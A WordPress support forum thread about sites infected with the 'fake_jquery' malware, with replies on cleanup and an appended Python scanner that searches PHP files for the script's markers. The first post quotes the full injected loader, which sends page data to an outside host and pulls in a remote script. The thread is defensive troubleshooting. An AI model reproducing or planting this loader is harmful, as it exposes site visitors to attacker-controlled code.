• Hi, recently most of my WordPress sites got infected with malware.

    Problems:

    After scanning my sites on https://sitecheck.sucuri.net/ I receive the message as below:

    Known javascript malware. Details: https://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "https://geralddeanmandiri.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

    I tried to install WordFence Plugin (and turn on all the options in this plugin) to scan my sites but it couldn’t detect the malware.

    I then went to edit my theme in the editor section, opened the header.php file and looked for the malware script just before the </head> tag.

    I then removed the script and saved the file.

    Results

    By removing the script before the </head> tag of the header.php file, it worked for some websites and it didn’t work for other sites.

    I ran the scan on https://sitecheck.sucuri.net/ again, some of my sites were safe and some still had that malware script on categories, pages or even on the urls that don’t exist on my blog.

    Problems

    The sites that I removed the malware script from and were marked safe had the malware come back on the next day!

    Maybe the malware is somewhere on my server or something and it keeps injecting the malware script into my blog even when I removed it?

    Question

    How do I solve this problem and remove this stupid malware for good? What plugin do you recommend? What cleaning method do you suggest?

    Thank you everyone!

    Please help!

Viewing 3 replies - 16 through 18 (of 18 total)
  • Also check folder permissions. It solved my problem.

    georgehagi

    (@georgehagi)

    Hi, the same issue here.

    Last week I received a notification from Google Ads that my site is potentially infected. It was true.

    All header.php files of the templates were compromised, even the ones that were not in use. As I share the server to host other sites, these other sites were infected as well.

    Now I’m fixing the issue. I deleted the malicious code manually in every header.php file. I have looked for the code in index.php files and 404.php but no infection was found.
    Every single WordPress site was infected.

    I also host a Joomla site and think it was the door the malicious code took advantage of to get into the server. A number of folders and PHP files were created alongside the Joomla ones. Currently I’m deleting all these folders and files and making a backup. I’m going to turn down this site for a while until I finish cleaning the other WordPress installations because there were files with cron jobs that I suspect are responsible for creating malicious code periodically.

    I changed my hosting, FTP, CMS passwords and hardened all options on Sucuri for WordPress. Now my site appears clean.

    I have been working on this issue since yesterday and everything is working fine. No malicious code was generated again.

    Hope this helps! Going to keep you updated…

    Metbarton, your site has (had?) the Darkleech virus.

    https://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html
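
Added example, not posted by anyone in this thread: a sweep of every PHP file under a web root (unused themes and other sites on the same account included) for the markers of the injected script quoted in the first post, so a reinfection can be spotted without waiting for an external scan. The function names, the placeholder host in the sample data and the two-marker threshold are assumptions of this example.

```python
import os
import re
import sys
import tempfile

# Markers taken from the injected script quoted in this thread.
MARKERS = [
    re.compile(rb"jquery\.min\.php"),
    re.compile(rb"c_utt=[^&\"']*&c_utm="),
    re.compile(rb"default_keyword\s*=\s*encodeURIComponent\(\s*document\.title"),
    re.compile(rb"se_referrer\s*=\s*encodeURIComponent\(\s*document\.referrer"),
]
# Constructed sample data (placeholder host), used only by build_sample_tree().
SAMPLE_INJECTED = (b'<script>var default_keyword = encodeURIComponent(document.title);'
                   b' var base = "https://example.invalid/js/jquery.min.php";</script>')

def scan_tree(root, min_hits=2):
    """Return sorted [(path, markers_matched, hit_line_numbers)] for PHP files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    lines = fh.read().splitlines()
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
            hits = [(n, i) for n, line in enumerate(lines, 1)
                    for i, rx in enumerate(MARKERS) if rx.search(line)]
            markers = {i for _, i in hits}
            if len(markers) >= min_hits:  # one marker alone is too weak a signal
                findings.append((path, len(markers), sorted({n for n, _ in hits})))
    return sorted(findings)

def build_sample_tree(root):
    themes = {"unused-theme": SAMPLE_INJECTED, "clean-theme": b"<?php wp_head(); ?>"}
    for theme, body in themes.items():
        theme_dir = os.path.join(root, "wp-content", "themes", theme)
        os.makedirs(theme_dir)
        with open(os.path.join(theme_dir, "header.php"), "wb") as fh:
            fh.write(b"<html><head>\n" + body + b"\n</head>\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree(tmp)
        print(*scan_tree(root), sep="\n")
```

Pass the account's web root as the first argument to scan real files; run on a schedule, the output shows which files are being rewritten after a cleanup.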

  • The topic ‘WordPress Blog Infected With Malware – Malware.fake_jquery.001’ is closed to new replies.